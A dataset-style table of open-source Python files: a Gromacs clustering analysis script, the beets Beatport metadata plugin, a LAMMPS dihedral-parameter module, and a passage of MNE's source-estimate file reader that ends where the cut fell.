| text | repo_name | path | language | license | size | keyword | text_hash |
|---|---|---|---|---|---|---|---|
"""
Example of running optical and contact clustering analysis on a Gromacs trajectory
"""
from __future__ import absolute_import, division, print_function
import os.path as op
import numpy as np
import numpy.testing as npt
import pdb
import gsd.hoomd
import sys
import clustering as cl
import random
import scipy
import time
#from context import clustering as cl
#from context import smoluchowski as smol
from cdistances import conOptDistanceCython,alignDistancesCython
#import imp
#cl = imp.load_source('cl','/home/rachael/Analysis_and_run_code/analysis/cluster_analysis/clustering/clustering.py')
data_path ='/home/rachael/coarsegraining/CG/active_learning/martini-assembly/dfmi/4_production' #folder where trajectory is
#trajectory should not have any water
#this can be done as follows:
#gmx trjconv -f after_eq.gro -o after_eq_whole.gro -pbc whole -s md.tpr
#choose protein
#gmx trjconv -f md.xtc -o md_whole.xtc -pbc whole -s md.tpr
#choose protein
#grompp -f md_dummy.mdp -c after_eq_whole.gro -p CG_dfmi_prot.top -o md_dummy.tpr
#where md_dummy.mdp is the same as the original mdp file but with water removed;
#the topology file is modified in the same way
def run_ang_spread():
"""
Try running on an xtc trajectory (from a pull simulation)
"""
trj = op.join(data_path,'md_whole.xtc')
tpr = op.join(data_path,'md_dummy.tpr')
molno = 100
ats = 33
tstart = 0
ttotal = 4000
cainds = range(12,23)
oainds = range(0,3)
cfname = op.join(data_path,'angle-spread-contact.dat')
ofname = op.join(data_path,'angle-spread-optical.dat')
comIDs = np.array([[12,13,14],[16,17,18],[20,21,22]])
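    # cutoff distances for the two cluster definitions, stored squared (presumably nm, the
    # Gromacs length unit): 0.5 for 'contact' clusters and 0.7 for 'optical' clusters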
cldict = {'contact':0.5*0.5,'optical':0.7*0.7}
cfname = op.join(data_path,'contact-CIDs.dat')
ofname = op.join(data_path,'optical-CIDs.dat')
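    # note that cfname/ofname are reassigned here, so writeAngSpread below writes to the
    # *-CIDs.dat paths rather than the angle-spread file names defined above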
start = time.time()
syst = cl.SnapSystem(trj,ats,molno,cldict,compairs=comIDs,
ttotal=ttotal,tstart=tstart,tpr=tpr)
end = time.time()
print("Time to setup: "+str(end-start)+"\n")
start = time.time()
syst.get_clusters_from_file('contact',cfname)
end = time.time()
print("Time to get contact: "+str(end-start)+"\n")
start = time.time()
syst.get_clusters_from_file('optical',ofname)
end = time.time()
print("Time to get optical: "+str(end-start)+"\n")
start = time.time()
syst.writeAngSpread('contact',cfname,cainds)
syst.writeAngSpread('optical',ofname,oainds)
end = time.time()
print("Time to get angle spread: "+str(end-start))
if __name__ == "__main__":
run_ang_spread()
| ramansbach/cluster_analysis | clustering/scripts/analyze_angspread_martini.py | Python | mit | 2,547 | ["Gromacs"] | ff4f871248d9e8633a8ed747e01adc297c89b9786744a71846b6b67c8968ebe8 |
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Adds Beatport release and track search support to the autotagger
"""
from __future__ import division, absolute_import, print_function
import json
import re
import six
from datetime import datetime, timedelta
from requests_oauthlib import OAuth1Session
from requests_oauthlib.oauth1_session import (TokenRequestDenied, TokenMissing,
VerifierMissing)
import beets
import beets.ui
from beets.autotag.hooks import AlbumInfo, TrackInfo, Distance
from beets.plugins import BeetsPlugin
from beets.util import confit
AUTH_ERRORS = (TokenRequestDenied, TokenMissing, VerifierMissing)
USER_AGENT = u'beets/{0} +http://beets.io/'.format(beets.__version__)
class BeatportAPIError(Exception):
pass
class BeatportObject(object):
def __init__(self, data):
self.beatport_id = data['id']
self.name = six.text_type(data['name'])
if 'releaseDate' in data:
self.release_date = datetime.strptime(data['releaseDate'],
'%Y-%m-%d')
if 'artists' in data:
self.artists = [(x['id'], six.text_type(x['name']))
for x in data['artists']]
if 'genres' in data:
self.genres = [six.text_type(x['name'])
for x in data['genres']]
class BeatportClient(object):
_api_base = 'https://oauth-api.beatport.com'
def __init__(self, c_key, c_secret, auth_key=None, auth_secret=None):
""" Initiate the client with OAuth information.
For the initial authentication with the backend `auth_key` and
`auth_secret` can be `None`. Use `get_authorize_url` and
`get_access_token` to obtain them for subsequent uses of the API.
:param c_key: OAuth1 client key
:param c_secret: OAuth1 client secret
:param auth_key: OAuth1 resource owner key
:param auth_secret: OAuth1 resource owner secret
"""
self.api = OAuth1Session(
client_key=c_key, client_secret=c_secret,
resource_owner_key=auth_key,
resource_owner_secret=auth_secret,
callback_uri='oob')
self.api.headers = {'User-Agent': USER_AGENT}
def get_authorize_url(self):
""" Generate the URL for the user to authorize the application.
Retrieves a request token from the Beatport API and returns the
corresponding authorization URL on their end that the user has
to visit.
This is the first step of the initial authorization process with the
API. Once the user has visited the URL, call
:py:method:`get_access_token` with the displayed data to complete
the process.
:returns: Authorization URL for the user to visit
:rtype: unicode
"""
self.api.fetch_request_token(
self._make_url('/identity/1/oauth/request-token'))
return self.api.authorization_url(
self._make_url('/identity/1/oauth/authorize'))
def get_access_token(self, auth_data):
""" Obtain the final access token and secret for the API.
:param auth_data: URL-encoded authorization data as displayed at
the authorization url (obtained via
:py:meth:`get_authorize_url`) after signing in
:type auth_data: unicode
:returns: OAuth resource owner key and secret
:rtype: (unicode, unicode) tuple
"""
self.api.parse_authorization_response(
"http://beets.io/auth?" + auth_data)
access_data = self.api.fetch_access_token(
self._make_url('/identity/1/oauth/access-token'))
return access_data['oauth_token'], access_data['oauth_token_secret']
def search(self, query, release_type='release', details=True):
""" Perform a search of the Beatport catalogue.
:param query: Query string
:param release_type: Type of releases to search for, can be
'release' or 'track'
:param details: Retrieve additional information about the
search results. Currently this will fetch
the tracklist for releases and do nothing for
tracks
:returns: Search results
:rtype: generator that yields
py:class:`BeatportRelease` or
:py:class:`BeatportTrack`
"""
response = self._get('catalog/3/search',
query=query, perPage=5,
facets=['fieldType:{0}'.format(release_type)])
for item in response:
if release_type == 'release':
if details:
release = self.get_release(item['id'])
else:
release = BeatportRelease(item)
yield release
elif release_type == 'track':
yield BeatportTrack(item)
def get_release(self, beatport_id):
""" Get information about a single release.
:param beatport_id: Beatport ID of the release
:returns: The matching release
:rtype: :py:class:`BeatportRelease`
"""
response = self._get('/catalog/3/releases', id=beatport_id)
release = BeatportRelease(response[0])
release.tracks = self.get_release_tracks(beatport_id)
return release
def get_release_tracks(self, beatport_id):
""" Get all tracks for a given release.
:param beatport_id: Beatport ID of the release
:returns: Tracks in the matching release
:rtype: list of :py:class:`BeatportTrack`
"""
response = self._get('/catalog/3/tracks', releaseId=beatport_id)
return [BeatportTrack(t) for t in response]
def get_track(self, beatport_id):
""" Get information about a single track.
:param beatport_id: Beatport ID of the track
:returns: The matching track
:rtype: :py:class:`BeatportTrack`
"""
response = self._get('/catalog/3/tracks', id=beatport_id)
return BeatportTrack(response[0])
def _make_url(self, endpoint):
""" Get complete URL for a given API endpoint. """
if not endpoint.startswith('/'):
endpoint = '/' + endpoint
return self._api_base + endpoint
def _get(self, endpoint, **kwargs):
""" Perform a GET request on a given API endpoint.
Automatically extracts result data from the response and converts HTTP
exceptions into :py:class:`BeatportAPIError` objects.
"""
try:
response = self.api.get(self._make_url(endpoint), params=kwargs)
except Exception as e:
raise BeatportAPIError("Error connecting to Beatport API: {}"
.format(e.message))
if not response:
raise BeatportAPIError(
"Error {0.status_code} for '{0.request.path_url}"
.format(response))
return response.json()['results']
@six.python_2_unicode_compatible
class BeatportRelease(BeatportObject):
def __str__(self):
if len(self.artists) < 4:
artist_str = ", ".join(x[1] for x in self.artists)
else:
artist_str = "Various Artists"
return u"<BeatportRelease: {0} - {1} ({2})>".format(
artist_str,
self.name,
self.catalog_number,
)
def __repr__(self):
return six.text_type(self).encode('utf-8')
def __init__(self, data):
BeatportObject.__init__(self, data)
if 'catalogNumber' in data:
self.catalog_number = data['catalogNumber']
if 'label' in data:
self.label_name = data['label']['name']
if 'category' in data:
self.category = data['category']
if 'slug' in data:
self.url = "http://beatport.com/release/{0}/{1}".format(
data['slug'], data['id'])
@six.python_2_unicode_compatible
class BeatportTrack(BeatportObject):
def __str__(self):
artist_str = ", ".join(x[1] for x in self.artists)
return (u"<BeatportTrack: {0} - {1} ({2})>"
.format(artist_str, self.name, self.mix_name))
def __repr__(self):
return six.text_type(self).encode('utf-8')
def __init__(self, data):
BeatportObject.__init__(self, data)
if 'title' in data:
self.title = six.text_type(data['title'])
if 'mixName' in data:
self.mix_name = six.text_type(data['mixName'])
self.length = timedelta(milliseconds=data.get('lengthMs', 0) or 0)
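        # fall back to the 'length' field ('minutes:seconds') when 'lengthMs' is missing or zero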
if not self.length:
try:
min, sec = data.get('length', '0:0').split(':')
self.length = timedelta(minutes=int(min), seconds=int(sec))
except ValueError:
pass
if 'slug' in data:
self.url = "http://beatport.com/track/{0}/{1}".format(data['slug'],
data['id'])
self.track_number = data.get('trackNumber')
class BeatportPlugin(BeetsPlugin):
def __init__(self):
super(BeatportPlugin, self).__init__()
self.config.add({
'apikey': '57713c3906af6f5def151b33601389176b37b429',
'apisecret': 'b3fe08c93c80aefd749fe871a16cd2bb32e2b954',
'tokenfile': 'beatport_token.json',
'source_weight': 0.5,
})
self.config['apikey'].redact = True
self.config['apisecret'].redact = True
self.client = None
self.register_listener('import_begin', self.setup)
def setup(self, session=None):
c_key = self.config['apikey'].as_str()
c_secret = self.config['apisecret'].as_str()
# Get the OAuth token from a file or log in.
try:
with open(self._tokenfile()) as f:
tokendata = json.load(f)
except IOError:
# No token yet. Generate one.
token, secret = self.authenticate(c_key, c_secret)
else:
token = tokendata['token']
secret = tokendata['secret']
self.client = BeatportClient(c_key, c_secret, token, secret)
def authenticate(self, c_key, c_secret):
# Get the link for the OAuth page.
auth_client = BeatportClient(c_key, c_secret)
try:
url = auth_client.get_authorize_url()
except AUTH_ERRORS as e:
self._log.debug(u'authentication error: {0}', e)
raise beets.ui.UserError(u'communication with Beatport failed')
beets.ui.print_(u"To authenticate with Beatport, visit:")
beets.ui.print_(url)
# Ask for the verifier data and validate it.
data = beets.ui.input_(u"Enter the string displayed in your browser:")
try:
token, secret = auth_client.get_access_token(data)
except AUTH_ERRORS as e:
self._log.debug(u'authentication error: {0}', e)
raise beets.ui.UserError(u'Beatport token request failed')
# Save the token for later use.
self._log.debug(u'Beatport token {0}, secret {1}', token, secret)
with open(self._tokenfile(), 'w') as f:
json.dump({'token': token, 'secret': secret}, f)
return token, secret
def _tokenfile(self):
"""Get the path to the JSON file for storing the OAuth token.
"""
return self.config['tokenfile'].get(confit.Filename(in_app_dir=True))
def album_distance(self, items, album_info, mapping):
"""Returns the beatport source weight and the maximum source weight
for albums.
"""
dist = Distance()
if album_info.data_source == 'Beatport':
dist.add('source', self.config['source_weight'].as_number())
return dist
def track_distance(self, item, track_info):
"""Returns the beatport source weight and the maximum source weight
for individual tracks.
"""
dist = Distance()
if track_info.data_source == 'Beatport':
dist.add('source', self.config['source_weight'].as_number())
return dist
def candidates(self, items, artist, release, va_likely):
"""Returns a list of AlbumInfo objects for beatport search results
matching release and artist (if not various).
"""
if va_likely:
query = release
else:
query = '%s %s' % (artist, release)
try:
return self._get_releases(query)
except BeatportAPIError as e:
self._log.debug(u'API Error: {0} (query: {1})', e, query)
return []
def item_candidates(self, item, artist, title):
"""Returns a list of TrackInfo objects for beatport search results
matching title and artist.
"""
query = '%s %s' % (artist, title)
try:
return self._get_tracks(query)
except BeatportAPIError as e:
self._log.debug(u'API Error: {0} (query: {1})', e, query)
return []
def album_for_id(self, release_id):
"""Fetches a release by its Beatport ID and returns an AlbumInfo object
or None if the release is not found.
"""
self._log.debug(u'Searching for release {0}', release_id)
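        # accept either a bare numeric Beatport ID or a full beatport.com release URL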
match = re.search(r'(^|beatport\.com/release/.+/)(\d+)$', release_id)
if not match:
return None
release = self.client.get_release(match.group(2))
album = self._get_album_info(release)
return album
def track_for_id(self, track_id):
"""Fetches a track by its Beatport ID and returns a TrackInfo object
or None if the track is not found.
"""
self._log.debug(u'Searching for track {0}', track_id)
match = re.search(r'(^|beatport\.com/track/.+/)(\d+)$', track_id)
if not match:
return None
bp_track = self.client.get_track(match.group(2))
track = self._get_track_info(bp_track)
return track
def _get_releases(self, query):
"""Returns a list of AlbumInfo objects for a beatport search query.
"""
# Strip non-word characters from query. Things like "!" and "-" can
# cause a query to return no results, even if they match the artist or
# album title. Use `re.UNICODE` flag to avoid stripping non-english
# word characters.
        query = re.sub(r'\W+', ' ', query, flags=re.UNICODE)
        # Strip medium information from query: things like "CD1" and "disc 1"
        # can also negate an otherwise positive result.
        query = re.sub(r'\b(CD|disc)\s*\d+', '', query, flags=re.I)
albums = [self._get_album_info(x)
for x in self.client.search(query)]
return albums
def _get_album_info(self, release):
"""Returns an AlbumInfo object for a Beatport Release object.
"""
va = len(release.artists) > 3
artist, artist_id = self._get_artist(release.artists)
if va:
artist = u"Various Artists"
tracks = [self._get_track_info(x) for x in release.tracks]
return AlbumInfo(album=release.name, album_id=release.beatport_id,
artist=artist, artist_id=artist_id, tracks=tracks,
albumtype=release.category, va=va,
year=release.release_date.year,
month=release.release_date.month,
day=release.release_date.day,
label=release.label_name,
catalognum=release.catalog_number, media=u'Digital',
data_source=u'Beatport', data_url=release.url)
def _get_track_info(self, track):
"""Returns a TrackInfo object for a Beatport Track object.
"""
title = track.name
if track.mix_name != u"Original Mix":
title += u" ({0})".format(track.mix_name)
artist, artist_id = self._get_artist(track.artists)
length = track.length.total_seconds()
return TrackInfo(title=title, track_id=track.beatport_id,
artist=artist, artist_id=artist_id,
length=length, index=track.track_number,
medium_index=track.track_number,
data_source=u'Beatport', data_url=track.url)
def _get_artist(self, artists):
"""Returns an artist string (all artists) and an artist_id (the main
artist) for a list of Beatport release or track artists.
"""
artist_id = None
bits = []
for artist in artists:
if not artist_id:
artist_id = artist[0]
name = artist[1]
# Strip disambiguation number.
name = re.sub(r' \(\d+\)$', '', name)
# Move articles to the front.
name = re.sub(r'^(.*?), (a|an|the)$', r'\2 \1', name, flags=re.I)
bits.append(name)
artist = ', '.join(bits).replace(' ,', ',') or None
return artist, artist_id
def _get_tracks(self, query):
"""Returns a list of TrackInfo objects for a Beatport query.
"""
bp_tracks = self.client.search(query, release_type='track')
tracks = [self._get_track_info(x) for x in bp_tracks]
return tracks
| MyTunesFreeMusic/privacy-policy | beetsplug/beatport.py | Python | mit | 18,362 | ["VisIt"] | d873c5c58d243d63c2f37da8cbf1fa8371d7e72664a6738813a55a45158cf597 |
import bond
class Dihedral(object):
"""Docstring for Dihedral"""
dihedral_eqib_len = ""
dihedral_force_const = ""
dihedral_master1 = ""
dihedral_master2 = ""
dihedral_slave1 = ""
dihedral_slave2 = ""
k1 = ""
k2 = ""
k3 = ""
k4 = ""
print_type = 0
dft = False
intermono = False
def __init__(self, dihedral_master1, dihedral_master2, dihedral_slave1, dihedral_slave2):
self.dihedral_master1 = dihedral_master1
self.dihedral_master2 = dihedral_master2
self.dihedral_slave1 = dihedral_slave1
self.dihedral_slave2 = dihedral_slave2
def get_unique(dihedrals):
""" Remove duplicate dihedrals
Keyword Arguments:
dihedrals - List of dihedrals to remove duplicates from
"""
dihedrals_new = []
for i in range(0,len(dihedrals)):
for j in range(0,len(dihedrals)):
if dihedrals[i] == dihedrals[j]:
continue
if dihedrals[i].dihedral_master1 == dihedrals[j].dihedral_master2 and dihedrals[i].dihedral_master2 == dihedrals[j].dihedral_master1:
if dihedrals[i].dihedral_slave1 == dihedrals[j].dihedral_slave2 and dihedrals[i].dihedral_slave2 == dihedrals[j].dihedral_slave1:
dihedrals_new.append(dihedrals[j])
dihedrals_new = remove_duplicates(dihedrals_new)
for i in range(0,len(dihedrals_new)):
dihedrals.remove(dihedrals_new[i])
return dihedrals
def remove_duplicates(l):
""" Given any list remove the duplicates from it
Keyword Arguments:
l - Any list that you want to remove duplicates from
"""
return list(set(l))
def create_dihedrals(dihedral,all=False):
""" Creates the dihedral objects
Keyword Arguments:
dihedral - A list of angles to create dihedral from
"""
dihedrals = []
for i in range(0,len(dihedral)):
outlist = [dihedral[i].Angle_master,dihedral[i].Angle_slave1,dihedral[i].Angle_slave2]
for j in range(0,len(dihedral)):
if dihedral[i] == dihedral[j]:
continue
inF = [dihedral[j].Angle_master,dihedral[j].Angle_slave1]
inS = [dihedral[j].Angle_slave1,dihedral[j].Angle_slave2]
inFL = [dihedral[j].Angle_master,dihedral[j].Angle_slave2]
if outlist[0] in inF and outlist[1] in inF:
dihedrals.append(Dihedral(outlist[0],outlist[1],outlist[2],inS[1]))
outlist[0].dihedral = True
outlist[1].dihedral = True
elif outlist[0] in inS and outlist[1] in inS:
dihedrals.append(Dihedral(outlist[0],outlist[1],outlist[2],inF[0]))
outlist[0].dihedral = True
outlist[1].dihedral = True
elif outlist[0] in inFL and outlist[1] in inFL:
dihedrals.append(Dihedral(outlist[0],outlist[1],outlist[2],inS[0]))
outlist[0].dihedral = True
outlist[1].dihedral = True
dihedrals = get_unique(dihedrals)
return dihedrals
def find_dihedral(master,slave,dihedrals):
""" Given a master and slave atom finds the dihedral that they master together.
Keyword Arguments:
master - The atom master you want to use in conjunction with the slave master to find the dihedral
slave - The slave master you want to using in conjunction with the master to find the dihedral
dihedrals - The list of dihedrals you want to check for this pair of masters
"""
for i in range(len(dihedrals)):
if dihedrals[i].dihedral_master1 == master and dihedrals[i].dihedral_master2 == slave:
return dihedrals[i]
if dihedrals[i].dihedral_master1 == slave and dihedrals[i].dihedral_master2 == master:
return dihedrals[i]
def set_opls(dihedrals,opls_dihedrals):
""" Sets the opls data into the dihedral object
Keyword Arguments:
dihedrals - The list of dihedral objects to set opls data into
opls_dihedrals - The list of opls data to scan
"""
for i in range(len(dihedrals)):
masters = [int(dihedrals[i].dihedral_master1.opls_bondid),int(dihedrals[i].dihedral_master2.opls_bondid)]
slaves = [int(dihedrals[i].dihedral_slave1.opls_bondid),int(dihedrals[i].dihedral_slave2.opls_bondid)]
masters.sort()
slaves.sort()
both = [str(slaves[0]),str(masters[0]),str(masters[1]),str(slaves[1])]
for j in range(len(opls_dihedrals)):
if both[0] == opls_dihedrals[j].opls_slave1 and both[1] == opls_dihedrals[j].opls_master1 and both[2] == opls_dihedrals[j].opls_master2 and both[3] == opls_dihedrals[j].opls_slave2:
dihedrals[i].k1 = opls_dihedrals[j].k1
dihedrals[i].k2 = opls_dihedrals[j].k2
dihedrals[i].k3 = opls_dihedrals[j].k3
dihedrals[i].k4 = opls_dihedrals[j].k4
def uniq_types(dihedrals):
""" Gets the unique type of dihedrals for lammps output
Keyword Arguments:
dihedrals - The list of dihedral objects to get unique types from
"""
uniq = []
uniqadd = []
for i in range(len(dihedrals)):
if [dihedrals[i].k1,dihedrals[i].k2,dihedrals[i].k3,dihedrals[i].k4] in uniqadd:
continue
if dihedrals[i].k1 == "":
continue
uniqadd.append([dihedrals[i].k1,dihedrals[i].k2,dihedrals[i].k3,dihedrals[i].k4])
uniq.append(dihedrals[i])
return uniq
def get_type(dihedral,type):
""" Gets the type of unique dihedral it is for lammps output
Keyword Arguments:
dihedral - The list of dihedral objects
type - The list of unique types
"""
for i in range(len(dihedral)):
for j in range(len(type)):
if dihedral[i].k1 == type[j].k1 and dihedral[i].k2 == type[j].k2 and dihedral[i].k3 == type[j].k3 and dihedral[i].k4 == type[j].k4:
dihedral[i].print_type = j+1
def set_dft(dihedral,bonds):
""" Given a list of dihedrals find if you should set dft values for those dihedrals or not.
Sets a boolean on the list of dihedrals that need dft calculations done to them.
Probably should return a list instead for speed optimization
Keyword Arguments:
dihedral - The list of dihedrals you want to check
bonds - The list of bonds you want to check
"""
for i in range(len(dihedral)):
mb1 = bond.get_bond(dihedral[i].dihedral_master1,dihedral[i].dihedral_master2,bonds)
if mb1.bond_type == '1':
ob1 = bond.get_bond(dihedral[i].dihedral_master1,dihedral[i].dihedral_slave1,bonds)
ob2 = bond.get_bond(dihedral[i].dihedral_master2,dihedral[i].dihedral_slave2,bonds)
            if ob1 is None or ob2 is None:
continue
if ob1.bond_type == '2' and ob2.bond_type == '2':
dihedral[i].dft = True
| sipjca/cmlparser_py | dihedral.py | Python | apache-2.0 | 6,904 | ["LAMMPS"] | 5ba389fa63116c8de9e96e842adb2da08e8b31e4528316852ba16156091708db |
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
# Mads Jensen <mje.mads@gmail.com>
#
# License: BSD (3-clause)
import os
import copy
from math import ceil
import warnings
import numpy as np
from scipy import linalg, sparse
from scipy.sparse import coo_matrix
from .filter import resample
from .evoked import _get_peak
from .parallel import parallel_func
from .surface import (read_surface, _get_ico_surface, read_morph_map,
_compute_nearest, mesh_edges)
from .source_space import (_ensure_src, _get_morph_src_reordering,
_ensure_src_subject)
from .utils import (get_subjects_dir, _check_subject, logger, verbose,
_time_mask)
from .viz import plot_source_estimates
from .fixes import in1d, sparse_block_diag
from .io.base import ToDataFrameMixin
from .externals.six.moves import zip
from .externals.six import string_types
from .externals.h5io import read_hdf5, write_hdf5
def _read_stc(filename):
""" Aux Function
"""
fid = open(filename, 'rb')
stc = dict()
fid.seek(0, 2) # go to end of file
file_length = fid.tell()
fid.seek(0, 0) # go to beginning of file
# read tmin in ms
stc['tmin'] = float(np.fromfile(fid, dtype=">f4", count=1))
stc['tmin'] /= 1000.0
    # read the sampling period (tstep) in ms
stc['tstep'] = float(np.fromfile(fid, dtype=">f4", count=1))
stc['tstep'] /= 1000.0
# read number of vertices/sources
vertices_n = int(np.fromfile(fid, dtype=">u4", count=1))
# read the source vector
stc['vertices'] = np.fromfile(fid, dtype=">u4", count=vertices_n)
# read the number of timepts
data_n = int(np.fromfile(fid, dtype=">u4", count=1))
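    # sanity check: the 4-byte words remaining after the four header fields and the vertex list
    # must fill a whole number of (data_n x vertices_n) data frames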
if (vertices_n and # vertices_n can be 0 (empty stc)
((file_length / 4 - 4 - vertices_n) % (data_n * vertices_n)) != 0):
raise ValueError('incorrect stc file size')
# read the data matrix
stc['data'] = np.fromfile(fid, dtype=">f4", count=vertices_n * data_n)
stc['data'] = stc['data'].reshape([data_n, vertices_n]).T
# close the file
fid.close()
return stc
def _write_stc(filename, tmin, tstep, vertices, data):
"""Write an STC file
Parameters
----------
filename : string
The name of the STC file.
tmin : float
The first time point of the data in seconds.
tstep : float
Time between frames in seconds.
vertices : array of integers
Vertex indices (0 based).
data : 2D array
The data matrix (nvert * ntime).
"""
fid = open(filename, 'wb')
# write start time in ms
fid.write(np.array(1000 * tmin, dtype='>f4').tostring())
    # write the sampling period (tstep) in ms
fid.write(np.array(1000 * tstep, dtype='>f4').tostring())
# write number of vertices
fid.write(np.array(vertices.shape[0], dtype='>u4').tostring())
# write the vertex indices
fid.write(np.array(vertices, dtype='>u4').tostring())
# write the number of timepts
fid.write(np.array(data.shape[1], dtype='>u4').tostring())
#
# write the data
#
fid.write(np.array(data.T, dtype='>f4').tostring())
# close the file
fid.close()
def _read_3(fid):
""" Read 3 byte integer from file
"""
data = np.fromfile(fid, dtype=np.uint8, count=3).astype(np.int32)
out = np.left_shift(data[0], 16) + np.left_shift(data[1], 8) + data[2]
return out
def _read_w(filename):
"""Read a w file and return as dict
w files contain activations or source reconstructions for a single time
point.
Parameters
----------
filename : string
The name of the w file.
Returns
-------
data: dict
The w structure. It has the following keys:
vertices vertex indices (0 based)
data The data matrix (nvert long)
"""
with open(filename, 'rb', buffering=0) as fid: # buffering=0 for np bug
# skip first 2 bytes
fid.read(2)
# read number of vertices/sources (3 byte integer)
vertices_n = int(_read_3(fid))
vertices = np.zeros((vertices_n), dtype=np.int32)
data = np.zeros((vertices_n), dtype=np.float32)
# read the vertices and data
for i in range(vertices_n):
vertices[i] = _read_3(fid)
data[i] = np.fromfile(fid, dtype='>f4', count=1)[0]
w = dict()
w['vertices'] = vertices
w['data'] = data
return w
def _write_3(fid, val):
""" Write 3 byte integer to file
"""
f_bytes = np.zeros((3), dtype=np.uint8)
f_bytes[0] = (val >> 16) & 255
f_bytes[1] = (val >> 8) & 255
f_bytes[2] = val & 255
fid.write(f_bytes.tostring())
def _write_w(filename, vertices, data):
"""Read a w file
w files contain activations or source reconstructions for a single time
point.
Parameters
----------
filename: string
The name of the w file.
vertices: array of int
Vertex indices (0 based).
data: 1D array
The data array (nvert).
"""
assert(len(vertices) == len(data))
fid = open(filename, 'wb')
# write 2 zero bytes
fid.write(np.zeros((2), dtype=np.uint8).tostring())
# write number of vertices/sources (3 byte integer)
vertices_n = len(vertices)
_write_3(fid, vertices_n)
# write the vertices and data
for i in range(vertices_n):
_write_3(fid, vertices[i])
# XXX: without float() endianness is wrong, not sure why
fid.write(np.array(float(data[i]), dtype='>f4').tostring())
# close the file
fid.close()
def read_source_estimate(fname, subject=None):
"""Read a soure estimate object
Parameters
----------
fname : str
Path to (a) source-estimate file(s).
subject : str | None
Name of the subject the source estimate(s) is (are) from.
It is good practice to set this attribute to avoid combining
incompatible labels and SourceEstimates (e.g., ones from other
subjects). Note that due to file specification limitations, the
subject name isn't saved to or loaded from files written to disk.
Returns
-------
stc : SourceEstimate | VolSourceEstimate
        The source estimate object loaded from file.
Notes
-----
- for volume source estimates, ``fname`` should provide the path to a
single file named '*-vl.stc` or '*-vol.stc'
- for surface source estimates, ``fname`` should either provide the
path to the file corresponding to a single hemisphere ('*-lh.stc',
'*-rh.stc') or only specify the asterisk part in these patterns. In any
case, the function expects files for both hemisphere with names
following this pattern.
- for single time point .w files, ``fname`` should follow the same
pattern as for surface estimates, except that files are named
'*-lh.w' and '*-rh.w'.
"""
fname_arg = fname
# make sure corresponding file(s) can be found
ftype = None
if os.path.exists(fname):
if fname.endswith('-vl.stc') or fname.endswith('-vol.stc') or \
fname.endswith('-vl.w') or fname.endswith('-vol.w'):
ftype = 'volume'
elif fname.endswith('.stc'):
ftype = 'surface'
if fname.endswith(('-lh.stc', '-rh.stc')):
fname = fname[:-7]
else:
err = ("Invalid .stc filename: %r; needs to end with "
"hemisphere tag ('...-lh.stc' or '...-rh.stc')"
% fname)
raise IOError(err)
elif fname.endswith('.w'):
ftype = 'w'
if fname.endswith(('-lh.w', '-rh.w')):
fname = fname[:-5]
else:
err = ("Invalid .w filename: %r; needs to end with "
"hemisphere tag ('...-lh.w' or '...-rh.w')"
% fname)
raise IOError(err)
elif fname.endswith('-stc.h5'):
ftype = 'h5'
fname = fname[:-7]
else:
raise RuntimeError('Unknown extension for file %s' % fname_arg)
    if ftype != 'volume':
stc_exist = [os.path.exists(f)
for f in [fname + '-rh.stc', fname + '-lh.stc']]
w_exist = [os.path.exists(f)
for f in [fname + '-rh.w', fname + '-lh.w']]
h5_exist = os.path.exists(fname + '-stc.h5')
        if all(stc_exist) and (ftype != 'w'):
ftype = 'surface'
elif all(w_exist):
ftype = 'w'
elif h5_exist:
ftype = 'h5'
elif any(stc_exist) or any(w_exist):
raise IOError("Hemisphere missing for %r" % fname_arg)
else:
raise IOError("SourceEstimate File(s) not found for: %r"
% fname_arg)
# read the files
if ftype == 'volume': # volume source space
if fname.endswith('.stc'):
kwargs = _read_stc(fname)
elif fname.endswith('.w'):
kwargs = _read_w(fname)
kwargs['data'] = kwargs['data'][:, np.newaxis]
kwargs['tmin'] = 0.0
kwargs['tstep'] = 0.0
else:
raise IOError('Volume source estimate must end with .stc or .w')
elif ftype == 'surface': # stc file with surface source spaces
lh = _read_stc(fname + '-lh.stc')
rh = _read_stc(fname + '-rh.stc')
assert lh['tmin'] == rh['tmin']
assert lh['tstep'] == rh['tstep']
kwargs = lh.copy()
kwargs['data'] = np.r_[lh['data'], rh['data']]
kwargs['vertices'] = [lh['vertices'], rh['vertices']]
elif ftype == 'w': # w file with surface source spaces
lh = _read_w(fname + '-lh.w')
rh = _read_w(fname + '-rh.w')
kwargs = lh.copy()
kwargs['data'] = np.atleast_2d(np.r_[lh['data'], rh['data']]).T
kwargs['vertices'] = [lh['vertices'], rh['vertices']]
# w files only have a single time point
kwargs['tmin'] = 0.0
kwargs['tstep'] = 1.0
elif ftype == 'h5':
kwargs = read_hdf5(fname + '-stc.h5', title='mnepython')
if ftype != 'volume':
# Make sure the vertices are ordered
vertices = kwargs['vertices']
if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):
sidx = [np.argsort(verts) for verts in vertices]
vertices = [verts[idx] for verts, idx in zip(vertices, sidx)]
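            # reorder the data rows to match the sorted vertices: left-hemisphere rows first,
            # then right-hemisphere rows offset by the left-hemisphere count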
data = kwargs['data'][np.r_[sidx[0], len(sidx[0]) + sidx[1]]]
kwargs['vertices'] = vertices
kwargs['data'] = data
if 'subject' not in kwargs:
kwargs['subject'] = subject
if subject is not None and subject != kwargs['subject']:
raise RuntimeError('provided subject name "%s" does not match '
'subject name from the file "%s'
% (subject, kwargs['subject']))
if ftype == 'volume':
stc = VolSourceEstimate(**kwargs)
else:
stc = SourceEstimate(**kwargs)
return stc
def _make_stc(data, vertices, tmin=None, tstep=None, subject=None):
"""Helper function to generate a surface, volume or mixed source estimate
"""
if isinstance(vertices, list) and len(vertices) == 2:
# make a surface source estimate
stc = SourceEstimate(data, vertices=vertices, tmin=tmin, tstep=tstep,
subject=subject)
elif isinstance(vertices, np.ndarray) or isinstance(vertices, list)\
and len(vertices) == 1:
stc = VolSourceEstimate(data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject)
elif isinstance(vertices, list) and len(vertices) > 2:
# make a mixed source estimate
stc = MixedSourceEstimate(data, vertices=vertices, tmin=tmin,
